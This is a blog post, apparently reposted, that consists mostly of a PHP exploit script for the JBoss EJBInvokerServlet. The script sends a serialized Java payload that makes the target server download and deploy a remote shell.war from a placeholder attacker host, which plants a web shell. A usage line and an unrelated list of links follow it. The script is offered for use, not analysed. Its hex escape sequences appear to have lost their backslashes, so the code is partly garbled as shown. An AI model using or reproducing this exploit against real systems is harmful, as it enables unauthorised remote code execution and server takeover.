• JBOSS invoker GETSHELL(PHP版)


    <?php
    
    $target = @$argv[1]; 
    $procotol = @$argv[2];
    
    if ($argc < 2) {
    	print "[-]:php Jboss.php https://targets:443 http/https 
    ";
    	exit(1);
    }
    
    $url="http://xx.xx.xx.xx/shell.war"; 
    
    
    $url_len=pack("n",strlen($url));
    
    function hex_dump($data, $newline="
    ") { 
    static $from = '';   
    static $to = '';    
    static $width = 16; static $pad = '.';  
     if ($from==='')   {     
         for ($i=0; $i<=0xFF; $i++)  { 
             $from .= chr($i);       
             $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;   
         }   
     }    
    $hex = str_split(bin2hex($data), $width*2);   
    $chars = str_split(strtr($data, $from, $to), $width);    
    $offset = 0;   
    foreach ($hex as $i => $line)   {     
        echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;    
       $offset += $width;   
      } 
    } 
    
    $frag_i=
    "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73". // ....sr.) org.jbos
    "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72". // s.invoca tion.Mar
    "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f". // shalledI nvocatio
    "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77". // n...'A>. ....xppw
    "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76". // .x..G..S .sr..jav
    "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2". // a.lang.I nteger..
    "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75". // .....8.. .I..valu
    "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e". // exr..jav a.lang.N
    "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00". // umber... ........
    "x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62". // xp&...sr .$org.jb
    "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d". // oss.invo cation.M
    "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc". // arshalle dValue..
    "xe0xd1xf4x4axd0x99x0cx00x00x78x70x77";
    
    $frag_ii="x00";
    
    $frag_iii=
    "xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e".     // .....ur. .[Ljava.
    "x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f". // lang.Obj ect;..X.
    "x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00". // .s)l...x p....sr.
    "x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e". // .javax.m anagemen
    "x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b". // t.Object Name....
    "xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73". // .m.....x pt.!jbos
    "x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65". // s.system :service
    "x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00". // =MainDep loyerxt.
    "x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00". // .deployu q.~.....
    "x01x74".
    $url_len.
    $url.
    "x75x72x00".
    "x13x5bx4cx6ax61x76x61x2ex6cx61".                         // ur..[ Ljava.la
    "x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d". // ng.Strin g;..V...
    "x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61". // {G...xp. ...t..ja
    "x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67";
    
    $frag_iv=
    "x0dxd3". 
    "xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67". // ..xw.... .sr."org
    "x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f". // .jboss.i nvocatio
    "x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8". // n.Invoca tionKey.
    "xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64". // .r...... ..I..ord
    "x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05". // inalxp.. ..sq.~..
    "x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78". // w....... ..p.W..x
    "x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04". // w.....sq .~......
    "x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e". // sr.#org. jboss.in
    "x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74". // vocation .Invocat
    "x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02". // ionTypeY .:..+|..
    "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00". // ..I..ord inalxp..
    "x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f". // ..sq.~.. ....pt..
    "x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73". // JMX_OBJE CT_NAMEs
    "x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d". // r..javax .managem
    "x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03". // ent.Obje ctName..
    "xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62". // ...m.... .xpt.!jb
    "x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69". // oss.syst em:servi
    "x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78". // ce=MainD eployerx
    "x78";                                                             // x
    
    $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;
    
    
    function vpost($url,$data){
    	$curl = curl_init(); 
    	curl_setopt($curl, CURLOPT_URL, $url);
    	curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); 
    	curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
    	curl_setopt($curl, CURLOPT_USERAGENT,'java'); 
    	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
    	curl_setopt($curl, CURLOPT_AUTOREFERER, 1); 
    	curl_setopt($curl, CURLOPT_POST, 1); 
    	curl_setopt($curl, CURLOPT_POSTFIELDS, $data); 
    	curl_setopt($curl, CURLOPT_TIMEOUT, 30); 
    	curl_setopt($curl, CURLOPT_HEADER, 0); 
    	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
    	$tmpInfo = curl_exec($curl);
    	if (curl_errno($curl)) {
    		echo "Curl https connect Error
    ";
    	}
    	curl_close($curl); 
    	return "Curl https connect suscess
    "; 
    }
    
    function tpost($url,$data){
    	$curl = curl_init(); 
    	curl_setopt($curl, CURLOPT_URL, $url);
    	curl_setopt($curl, CURLOPT_USERAGENT,'java'); 
    	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
    	curl_setopt($curl, CURLOPT_AUTOREFERER, 1); 
    	curl_setopt($curl, CURLOPT_POST, 1); 
    	curl_setopt($curl, CURLOPT_POSTFIELDS, $data); 
    	curl_setopt($curl, CURLOPT_TIMEOUT, 30); 
    	curl_setopt($curl, CURLOPT_HEADER, 0); 
    	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
    	$Info = curl_exec($curl);
    	if (curl_errno($curl)) {
    		echo "Curl http connect Error
    ";
    	}
    	curl_close($curl); 
    	return "Curl http connect suscess
    "; 
    }
    
    if($procotol == "https")
    {
    	echo vpost($target."/invoker/EJBInvokerServlet/", $data);
    }else if ($procotol == "http")
    {
    	echo tpost($target."/invoker/EJBInvokerServlet/", $data);
    }else
    {
    	print "your not enter data
    ";
    	exit(0);
    }
    
    
    ?>
    

      

    Use: php jboss.php https://www.xx.com:443 http/https

  • 相关阅读:
    js数组从小到大排序
    高效率去掉js数组中重复项
    Oracle start with.connect by prior子句实现递归查询
    ofbiz进击 。 ofbiz 退货流程(包含获取可退货项流程分析 以及 取消退货项的过程分析)
    ofbiz进击 个人遇到的奇葩问题汇总。
    ofbiz进击 第六节。 --OFBiz配置之[widget.properties] 配置属性的分析
    ofbiz进击 第五节。 --OFBiz配置之[general.properties] 共有属性的分析(含email)
    ofbiz进击 第四节。 我的form之旅
    &nbsp|&quot|&amp|&lt|&gt等html字符转义
    ofbiz进击 第三节。 各个关键文件的说明与作用
  • 原文地址:https://www.cnblogs.com/killbit/p/4357216.html
Copyright © 2020-2023  润新知